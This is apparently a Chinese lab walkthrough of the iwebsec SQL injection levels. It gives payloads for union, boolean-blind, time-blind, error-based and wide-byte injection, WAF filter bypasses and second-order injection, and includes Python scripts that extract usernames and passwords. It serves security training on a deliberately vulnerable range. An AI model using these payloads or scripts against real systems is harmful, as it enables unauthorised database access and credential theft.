iwebsec系列
文章目录
SQL注入漏洞
01-数字型注入
此时id=1
判断是否阔以进行注入
?id=2 and 1=1
确定有多少列
?id=2 order by 3
看回显
?id=-2 union select 1,2,3
查数据库的名称
?id=-2 union select 1,2,database()
查看表名
?id=-2 union select 1,2,(select table_name from information_schema.tables where table_schema='iwebsec' limit 0,1)
查看列名
?id=-2 union select 1,2,(select column_name from information_schema.columns where table_name='sqli' limit 0,1)
这时我们看第二列的名字
limit 0,1改成limit 1,1
limit 1,1改成limit 2,1
看字段对应的数据
查看第一个用户的姓名和密码
?id=-2 union select 1,2,(select username from iwebsec.sqli limit 0,1)
?id=-2 union select 1,2,(select password from iwebsec.sqli limit 0,1)
02-字符型注入
?id=1' --+
没有报错
查看又几列
?id=1' order by 3 --+
?id=1' order by 4 --+
有三列
查看回显位
?id=-1' union select 1,2,3 --+
查看数据库名称
?id=-1' union select 1,2,database(); --+
查看表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec' --+
查看字段名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sqli' --+
查看用户名和密码
?id=-1' union select 1,2,group_concat(username,0x7e,password) from iwebsec.sqli --+
03-bool注入
正确回显的是有welcome to iwebsec!!!
加个引号,回显的是1,说明注入错误
?id=1'
前面加一个引号发现,回显正确
?id='1'
判断数据库的长度
#encoding=utf-8
import requests
import os
url="http://www.iwebsec.com:81/sqli/03.php"
def DbLen():
for i in range(1,20):
payload="?id=1 and (length(database())={})--+".format(i)
req_url=url+payload
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
print("DB length is "+str(i))
DbLen()
获取数据库名
def DbName():
result=""
for i in range(1,8):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=1 and ord(mid((select database()),{},1))>{} --+".format(i,mid)
req_url=url+payload
print(req_url)
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
DbName()
输出表名
def TablesName():
result=""
for i in range(1,50):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=1 and ord(mid((select group_concat(table_name)
from information_schema.tables where table_schema=database()),{},1))>{} --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
TablesName()
输出列名
def ColumnsName():
result=""
for i in range(1,30):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=1 and ord(mid((select group_concat(column_name)
from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
ColumnsName()
输出名字和密码
def GetData():
result=""
for i in range(1,200):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=1 and ord(mid((select group_concat(password,0x7e,username) from iwebsec.sqli),{},1))>{} --+".format(i,mid)
req_url=url+payload
#print(req_url)
rep=requests.get(url=req_url)
if "welcome to iwebsec!!!" in rep.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
GetData()
04-sleep注入
通过sqlmap,进行渗透测试发现是时间注入
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 9858 FROM (SELECT(SLEEP(5)))wyzG)
时间注入主要还是盲注,但是盲注的是有回显,而且时间注入的条件,无论是否有错闭合,结果都是原来的结果,没有错误的出现,因此只有用sleep函数来判断是否是注入成功,如果时间延迟则证明匹配成功,反之,则没有匹配成功
判断数据库的长度
?id=if(length(database())=7,sleep(1),1)--+
如果数据库的长度等于7,时间会延迟,返回值是TRUE
#encoding=utf-8
import requests
import os
import time
url="http://www.iwebsec.com:81/sqli/04.php"
def DbLen():
for i in range(1,10):
payload="?id=if(length(database())={},sleep(1),1)--+".format(i)
req_url=url+payload
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
print("DB length is "+str(i))
DbLen()
获取数据库名
def DbName():
result=""
for i in range(1,8):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
DbName()
时间注入有一些诟病,当网络条件不够优秀的情况下,有可能会因为网络延迟导致误判,尽可能选条件好的情况下进行渗透测试,或者讲sleep()函数值调大一些,掩蔽因为网络延迟造成的误判
输出数据库中的表名
def TablesName():
result=""
for i in range(1,50):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=if(ord(mid((select group_concat(table_name)
from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
TablesName()
输出数据库列名
def ColumnsName():
result=""
for i in range(1,30):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=if(ord(mid((select group_concat(column_name)
from information_schema.columns where table_schema=database() and table_name='sqli'),{},1))>{},sleep(1),1) --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
ColumnsName()
输出数据信息
def GetData():
result=""
for i in range(1,120):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=if(ord(mid((select group_concat(username,0x7e,password) from iwebsec.sqli),{},1))>{},sleep(1),1) --+".format(i,mid)
req_url=url+payload
print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result=result+chr(mid)
print("the result is {}".format(result))
GetData()
05-updatexml注入
报错注入利用的是updatexml(目标xml文档,xml路径,更新的内容),通过报错将想要查询的数据返回注入的数据
找到数据库的用户名
?id=1 and updatexml(1,concat(0x7e,(select user()),0x7e),1) --+
输出数据库中的表名
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
输出数据库的列名
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) #
输出用户和密码
?id=1 and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from iwebsec.users),0x7e),1) #
此方法是updatexml()函数,还有extractvalue(目标xml文档,xml路径),payload相似
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
下面的阔以仿制以上的payload,来爆出数据库的列名,字段
06-宽字节注入
判断是否纯在宽字节注入攻击
?id=1%df' and 1=2%23
?id=1%df' and 1=1%23
存在宽字节注入
判断列数
?id=1%df' order by 4%23
查看数据库
?id=-1%df' union select 1,2,concat(database())%23
查看表名
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23
查看列名
注:
当我们查看字段的时不能用
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sqli'--+
因为这里是会出现报错,有’,发生转义
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 0,1)%23
查看字段
?id=-1%df' union select 1,2,group_concat(username,0x7e,password) from iwebsec.sqli%23
07-空格过滤注入
服务器对输入的参数进行空格进行过滤
绕过空格过滤需要%0a,/**/,()
?id=-3/**/union/**/select/**/1,2,group_concat(concat(username,0x7e,password))%0afrom/**/iwebsec.users
08-大小写过滤
服务器对小写过滤,而Mysql的语法中无论是否存在大小写,都阔以执行
?id=-2 unIon sElect 1,2, Group_concat(pasSword,0x7e,usERname) fRom iwebsec.sqli
09-双写关键字绕过
对某个关键字过滤,例如:select,双写selselectect
?id=-1 union seleselectct 1,2,group_concat(username,0x7e,password) from iwebsec.sqli
10-双重url编码绕过
服务器对注入的代码进行了一次url编码,url编码注入匹配成功绕过waf
?id=-1%20union%20Select%201%2C2%2Cgroup_concat(concat(username%2C0x7e%2Cpassword))%20from%20iwebsec.users
11-十六进制绕过
十六进制是绕过引号过滤,几乎没有任何能够过滤十六进制的waf
只要把iwebsec字符串转化成十六进制就阔以绕过
将’iwebsec’换成0x69776562736563
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x69776562736563
12-等价函数替换过滤
等号过滤?id=1 and 1=1,行不通,但是有注入点
所以就将and 1=1换成and 1>0
如果=不能用,阔以使用LIKE谓词来代替
like ‘<匹配串>’,其中含义是查找指定的属性列值与匹配串中相匹配的元组,其阔以是一个完整的字符串,同时也阔以含通配符%,_
%:阔以代表任意字符串,例如a%b以a开头b结尾的任意长度的字符串
_:单个字符,例如a_b,以a为开头b结尾长度为三的任意字符串
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema like 'iwebsec'
13-二次注入
首先先注册一个账号,账号是一个脏数据
找回密码的时候邮箱是123
select * from sqli where username='admin'#'
#将后面的注释掉
时间最不偏私,给任何人都是二十四小时;时间也最偏私,给任何人都不是二十四小时。——赫胥黎